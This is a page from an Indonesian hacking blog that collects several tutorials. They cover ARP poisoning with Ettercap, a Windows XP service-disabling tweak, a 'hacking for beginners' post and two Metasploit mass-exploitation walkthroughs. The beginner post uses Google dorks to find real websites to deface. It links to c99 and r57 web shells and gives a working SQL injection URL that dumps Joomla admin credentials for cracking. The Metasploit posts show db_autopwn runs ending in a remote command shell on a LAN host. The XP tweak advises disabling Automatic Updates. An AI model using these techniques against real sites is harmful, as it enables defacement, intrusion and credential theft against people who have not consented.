Wellcome...

WARNING...!!!


SEMUA YANG ADA DI DALAM BLOG INI HANYA UNTUK PEMBELAJARAN SEMATA-MATA

MOHON JANGAN DISALAHGUNAKAN...

TERIMAKASIH...


OZY

Labels

Saturday, March 20, 2010

Man In The Middle Attack

Ettercap adalah sebuah alat yang dibuat oleh Alberto Ornaghi (Alor) dan Marco Valleri (NAGA) dan pada dasarnya adalah sebuah suite untuk manusia di tengah serangan pada sebuah LAN. Bagi mereka yang tidak suka ike Command Interface (CLI), namun disediakan dengan antarmuka grafis yang mudah. 

Ettercap mampu melakukan serangan terhadap protokol ARP dengan memposisikan diri sebagai "manusia di tengah" dan, sekali diposisikan sebagai ini, dapat: 
- Menginfeksi, mengganti, menghapus data dalam sambungan 
- Menemukan password untuk protokol seperti FTP, HTTP, POP, SSH1, dll ... 
- Memberikan sertifikat SSL palsu HTTPS bagian kepada para korban. 
- Etc ... 

Plugin ini juga tersedia untuk penyerangan seperti DNS spoofing. 

Apa yang dimaksud dengan "laki-laki di tengah-tengah" serangan? 
Ini adalah serangan bajak laut di mana sebuah mesin mewujudkan dalam cara yang logis antara dua mesin berbicara bersama-sama seperti yang ditunjukkan pada gambar di bawah ini. 
Sekali dalam posisi ini, bajak laut dapat melancarkan banyak serangan berbahaya yang sangat berbeda karena dia berada di jalan antara ke dua mesin normal. 

Ada beberapa jenis serangan untuk menjadi "manusia di tengah", kita akan melihat dalam serangan tutorial ini didasarkan pada protokol ARP. 
Protokol ARP adalah sebuah protokol lapisan 3 digunakan untuk menerjemahkan alamat IP (ex: 192.168.1.1) ke alamat kartu jaringan fisik atau alamat MAC (ex: 0fe1.2ab6.2398). 
Ketika sebuah perangkat mencoba untuk mengakses sumber daya jaringan, pertama-tama akan mengirimkan permintaan ke perangkat lain meminta alamat MAC yang terkait dengan IP yang diinginkan untuk mencapai.Pemanggil akan menjaga IP - MAC asosiasi dalam cache, cache ARP, untuk mempercepat koneksi baru ke alamat IP yang sama. 

Serangan terjadi ketika sebuah mesin meminta yang lain untuk mencari alamat MAC yang terkait dengan alamat IP. Bajak laut akan menjawab ke pemanggil dengan paket-paket palsu bahwa alamat IP diasosiasikan dengan alamat MAC-nya sendiri dan dengan cara ini, akan "jalan pintas" yang sebenarnya IP - MAC jawaban asosiasi yang berasal dari host lain. Serangan ini disebut ARP poisoning atau ARP spoofing dan hanya memungkinkan jika pembajak dan korban berada dalam domain broadcast yang sama yang didefinisikan pada host dengan alamat IP dan subnet mask, misalnya: 192.168.1.1 255.255.255.0 

Dalam tutorial kami, kami akan menggunakan studi kasus di bawah ini di mana sebuah mesin dengan IP 192.168.1.2 mencapai sumber daya internet dari jaringan lokal. Setelah serangan ARP poisoning, The ettercap mesin dengan IP 192.168.1.100 tersebut ditetapkan sebagai "manusia di tengah". 







Harap dicatat hal-hal berikut tentang perilaku mesin ettercap:


--

--

--


Setiap kali ettercap dimulai, itu Menonaktifkan IP forwarding di kernel dan mulai untuk meneruskan paket-paket itu sendiri. 
Dapat memperlambat kinerja jaringan antara dua host karena paket-paket 'proses mesin waktu. 
Ettercap membutuhkan hak akses root untuk membuka soket Link Layer. Setelah fase inisialisasi, hak-hak istimewa root tidak diperlukan lagi, jadi mereka ettercap tetes UID = 65535 (nobody). Sejak ettercap telah untuk menulis (membuat) log files, itu harus dilaksanakan dalam sebuah direktori dengan izin yang tepat.
Tujuan dari tutorial kami adalah untuk memberikan peringatan tentang bahaya dari "manusia di tengah" serangan ARP spoofing. Pada tutorial peracunan ARP, kami akan menjelaskan bagaimana mengkonfigurasi mesin ettercap sebagai "manusia di tengah", kemudian, di dalam penyaringan tutorial, kami akan menunjukkan beberapa serangan. Akhirnya, beberapa langkah penanggulangan diberikan untuk melawan keracunan ARP terkutuk ini serangan. 

XP TWEAKING

Sebenarnya banyak aplikasi buat tweak XP, baik secara manual maupun meggunakan software. Namun kali ini gw bakal kasih tips buat lo2 pade terutama matiin aplikasi pada service.

Jalankan services.msc (start,run,services.msc)

matikan/disablekan service-2 berikut ini yang tidak berguna
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service
IPSEC Services
Messenger
Net Logon
Net Meeting
Remote Desktop Sharing
Network DDE
Network DDE DSDM
Portable Media Serial Number
Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Telnet Themes
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adapto

Hacking untuk Pemula

Level : Pemula

Hampir semua para pemula yang pingin hacking web atau deface web, menggunakan jasa layanan
seacrh engine site google alias mengandalkan dork, xixixixixixi. Pokoknya ada suka dan duka
disaat pencarian target, xixixixixixi. Sukanya dapat tuh target dan dukanya gak dapat sama
sekali, wuakakakakakaka, dan tak lupa juga para pemula yang mau belajar hacking, gak lepas
dari sisi site milw0rm. Disini aku akan melampirkan beberapa teknik hacking web yang masih
berlaku dan bisa digunakan.



Hacking pada Ourspace 2.0.9
---------------------------
Awalnya buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343. Ok kita dah ambil toh. Sekarang kita akan mencoba

1. Buka google, trus ketik inurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di hack
contohnya : http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi

4. Setelah itu muncul kalimat upload files

5. Isi deh atau upload file html anda.




Hacking Remote File Inclusion
-----------------------------
Disini saya akan menguraikan dengan singkat dari teknik hacking RFI.

1. Buka google trus ketik "Php Blue Dragon" pada search enginenya

2. Setelah itu cari situs yang mau di hack
Contohnya : http://www.komix91.ovh.org (site dikiri, da lama aku hack tapi lupa bugnya yang mana, hehehehehehe)
Ngomong-ngomong karena aku da lupa bug mana tuh, lebih baik kalian cari aja di http://www.milw0rm.com
Klik search trus ketik PHP BLUE DRAGON. Ini hasil dari serach pada milw0rm.
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
Oke, selanjutnya kalian coba aja sendiri ya. Ngomong-ngomong kalau ada kata evil code pada bug situ itu
maksudnya web shell. Kalau gak ada web shell pake punya aku aja. Itung-itung amal, hehehehehehehe
- http://www.geocities.com/engel_hacking/r57.txt?
- http://www.geocities.com/engel_hacking/c99.txt?
- http://www.geocities.com/engel_hacking/Ekin0x.txt?
Well, jangan terpengaruh di link web shell aku yang ada kata engel_hacking, aku bukan malaikat hacking, tapi
ngaku-ngaku malaikat hacking, wuakakakakakakakaka. Padahal gak hebat amat. Cuma Internet Holic doank. Hehehe

3. Selamat mencoba ya. Semoga sukses.




Hacking SQL Injection
---------------------
Disini saya akan menguraikan singkat teknik hacking SQL injection. Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh disini saya mengambil BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk me-
ncari bug sql pada web.

2. Singkat penjelasan kalau kita telah mendapatnya sekarang kita injeck. Contoh :
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, kalau belum ada silakan download di google.

4. Selamat Mencoba. Semoga sukses




Pesan sebelum mencoba : Disini saya hanya menguraikan beberapa teknik hacking yang sering digunakan oleh pemula, seperti yang telah saya jelaskan diatas.
banyak pemula pingin hacking web atau deface, menggunakan layanan site google dan site milw0rm.
Kayaknya da cukup penjelasan singkat saya mengenai hacking. Informasi lebih lanjut anda bisa memncari di beberapa sumber yang lebih
detail membahas tentang hacking. Lagian disini saya hanya menjelaskan dengan singkat and just internet holic.
" Jangan pernah malu untuk menjadi seorang pemula "


WARNING!!!!!! INI HANYA UNTUK PEMBELAJARAN SEMATA, MOHON JANGAN DISALAH GUNAKAN!!!

Metasploit In Actions Part 2

Artikel ini merupakan lanjutan dari artikel sebelumnya yaitu Metasploit I : Teknik Dasar. Dalam artikel yang kedua ini saya ingin membahas mengenai penggunaan metasploit untuk mass exploitation dengan menggunakan db_autopwn.
Sebelumnya pastikan instalasi metasploit kita sudah terintegrasi terlebih dahulu dengan database (bisa menggunakan MySQL, postgre, ataupun SQLite3) dan nmap. Prosedur instalasinya silahkan anda lihat disini.
Metode mass exploitation pertama yang akan saya gunakan dalam artikel ini menggunakan teknik mass exploit pada satu mesin dengan memanfaatkan vulnerability di seluruh layanan server/port yang terbuka, atau kita istilahkan pendekatan secara vertikal (istilah ini ndak akan ketemu kalo mbuka-mbuka kamus eksploitasi sistem, lha wong istilahnya made in indo hahaha.. ). Model pendekatan yang lain juga akan dicoba (secara singkat) di bawah artikel ini.

Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :

$ sudo msfconsole

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 132 aux

- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)

msf > load db_mysql

[*] Successfully loaded plugin: db_mysql

- Sambungkan metasploit dengan database di MySQL

msf > db_connect msf:msf@localhost/metasploit
msf >

- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.

msf > db_nmap -v -sS 192.168.1.10

[*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT STATE SERVICE
NMAP: 135/tcp open msrpc
NMAP: 139/tcp open netbios-ssn
NMAP: 445/tcp open microsoft-ds
NMAP: 1025/tcp open NFS-or-IIS
NMAP: 1026/tcp open LSA-or-nterm
NMAP: 1043/tcp open boinc
NMAP: 1433/tcp open ms-sql-s
NMAP: 1521/tcp open oracle
NMAP: 1723/tcp open pptp
NMAP: 3372/tcp open msdtc
NMAP: 3389/tcp open ms-term-serv
NMAP: 12345/tcp open netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >

- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan

msf > db_autopwn -h

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disbale exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf >

- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database

msf > db_autopwn -p -t

[*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Lakukan exploitasi system dengan menambahkan opsi -e :

msf > db_autopwn -p -t -e

[*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.6:46451 -> 192.168.1.10:29595

- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Owned… !!

Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :

msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24

[*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT STATE SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >

Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.

Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri.. :D
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install :D

Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.

WARNING!!!!!! INI HANYA UNTUK PEMBELAJARAN SEMATA, MOHON JANGAN DISALAH GUNAKAN!!!

Metasploit In Actions Part 1

Posting ini kubuat sebagai salah satu contoh audit security halah.. pentest aja yah bahasanya di network lokal tempatku bekerja. Ndak pake kata-kata hacking lah.. Wong cuman manfaatin tools yang disebar di inet kok disebut hacking :p. Soalnya banyak kale yang test metasploit seperti ini dan dibilang hacking bla-bla-bla. :-p. Go to side corner lamerzz… Post ini juga buat bayar utang ma hardie soal metasploit :D Ini coy dah kutepatin janjinya. silahkan coba sendiri ya. cara yang paling mudah sebenarnya bisa menggunakan OS BackTrack, tapi disini saya menggunakan ubuntu yang telah diinstall metasploit. Langkah instalasinya bisa dilihat disini.

Metasploit : msfconsole
Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan :D . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:
$ msfconsole

Metasploit

Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :

msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
load Load a framework plugin
loadpath Searches for and loads modules from a path
quit Exit the console
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

msf > show exploits

List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :

windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :

msf > sudo nmap -v -sS -A -O 192.168.1.28

